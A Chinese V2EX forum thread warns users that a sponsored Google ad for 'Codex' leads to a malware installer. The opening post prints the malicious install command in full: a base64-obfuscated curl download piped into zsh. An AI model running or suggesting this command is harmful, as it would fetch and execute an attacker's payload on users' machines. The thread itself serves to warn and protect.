V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
• 请不要在回答技术问题时复制粘贴 AI 生成的内容
zrc
V2EX  ›  程序员

紧急避雷! google 搜 Codex 第一个结果是个病毒,千万别装,我已中招!

  •  
  •   zrc · 1h 50m ago · 802 views

    rt ,这个也确实怪我大意了,不小心中招了,发个帖希望各位站友别犯错

    今天用 cc 编码,minmax 模型实在是问题多,我就去 google 搜 codex 官网,下载 codex 试试的 搜索的第一个我就点击进去了(截止发帖时间,依然在第一个),我后面对比了下与 chatgpt 的页面一毛一样 google 截图

    然后我点击第一个链接进去后,按照页面提示点击安装按钮 ScreenShot_2026-05-11_224758_197.png

    安装命令我贴出来下

    echo "Downloading Codex: https://chatgpt.com/codex-app/Codex.dmg" && curl -s $(echo "aHR0cHM6Ly9ncmVlbmFjdGl2LmNvbS9jdXJsLzRhZjU5ZjBmYTY3YjI5MDljOWQxMWFmM2UwMmE3OTE4MjcxMDhlMmQ1MjU5OGMyN2Y2Mjg2NmEwNDAzMDk2Mzc=" | openssl base64 -d -A) | zsh
    

    这个脚本各种混淆,以及 echo 复杂。。翻译了好半天才找到位置

    20 replies    2026-05-12 00:39:08 +08:00
    mangmaimu
        1
    mangmaimu  
       1h 47m ago via iPhone
    从来没看到过赞助商广告,不知道是区域不同,还是 adguard 或者 UBlock 过滤了
    zrc
        2
    zrc  
    OP
       1h 44m ago
    是我太大意了。。走的代理,区域是香港。
    这个域名还是 business.google.com 第一眼看是 google 的域名,也就点进去了。。唉,长记性了
    HFX3389
        3
    HFX3389  
       1h 42m ago
    前面给个真的,后面掺上假的
    shoaly
        4
    shoaly  
       1h 34m ago
    装一个 去广告插件的重要性就来了
    since2021
        5
    since2021  
       1h 33m ago
    为什么不装 ubo ~
    dryyun
        6
    dryyun  
       1h 28m ago
    @zrc #2 这域名不是 google.com 域名吗? 看着二级域名不同而已。
    AlexaZhou
        7
    AlexaZhou  
       1h 28m ago   ❤️ 2
    我一直觉得这种复制一个命令,让用户自己来安装软件的方式,对用户非常危险,根本就不知道装了什么,有没有病毒,今天这就有人中招了

    建议大家要抵制这种,尽量不要用这种方式安装
    zrc
        8
    zrc  
    OP
       1h 23m ago via Android
    @dryyun 是啊,google 域名,而且这个链接已经 100 万次点击,不知道有多少人中招了
    psllll
        9
    psllll  
       1h 23m ago
    这网站怎么 520 了
    e23nome
        10
    e23nome  
       1h 22m ago
    @since2021 有数据称 32.5%的美国互联网用户会使用广告拦截工具。

    所以美国的虚假竞价排名广告的受害者也是很多的。这也是为什么有这种赞助商广告,并附加月访问量超过 100 万次的背书(虽然有知识的人会觉得太少了)。

    谷歌和脸书的收入里相当比例的都是这种诈骗/虚假/恶意广告,哈哈。
    e23nome
        11
    e23nome  
       1h 15m ago
    而且这个图(去红框)喂给 AI ,AI 很容易告诉你这个广告是假的。

    为啥谷歌投放广告的入口却没有 AI 筛查,就不得而知了。
    e23nome
        12
    e23nome  
       1h 10m ago
    chatGPT 说

    2. 第二个广告:business.google.com / Install ChatGPT Codex
    这个比较奇怪。标题是 ChatGPT Codex ,但显示域名是 business.google.com 。不一定就是诈骗,也可能是 Google Business/广告跳转配置问题,但我会谨慎,不建议点。


    我的之所以是第二个,因为我的搜索页面显示了两个赞助商广告,第一个是 openAI 自己投的。
    realpg
        13
    realpg  
    PRO
       57 mins ago   ❤️ 2
    google 搜出来竞价病毒: 大家警惕避雷
    百度搜出来竞价虚假网站: 百度傻逼 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx
    Kizishao
        14
    Kizishao  
       39 mins ago
    把安装脚本发给 Gemini ,回复称其为一段典型的恶意脚本,并称其为“恶意广告欺诈”,是通过高价竞价竞标来的。它还提醒 curl | sh 的安装方式极端危险,除非官方文档。

    Google 自己都没有用自家的 AI 去审核,实在有些说不过去。
    layden
        15
    layden  
       39 mins ago
    装个 uBlock 吧,不会吃太多性能的。
    dingawm
        16
    dingawm  
       38 mins ago
    @mangmaimu #1 如果代理 IP 送中了,那就是不会有广告
    zpvip
        17
    zpvip  
       23 mins ago
    你能把链接贴出来吗,网页截图上显示的 business.google.com 我打开是正常的 Google 子站,我都是自动登录的状态。

    Google 赞助商允许链接显示 business.google.com ,但实际链接变成病毒站?你是不是浏览器中毒在先?
    ragnaroks
        18
    ragnaroks  
       13 mins ago
    看起来是拓展或用户脚本注入的?

    无任何拓展的全新 chrome 多次实验不同的常见搜索词,没有一个搜索结果下面是有"过去一个月内访问量超过 100 万次"这种文本的
    ragnaroks
        19
    ragnaroks  
       11 mins ago
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   1523 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 54ms · UTC 16:45 · PVG 00:45 · LAX 09:45 · JFK 12:45
    ♥ Do have faith in what you're doing.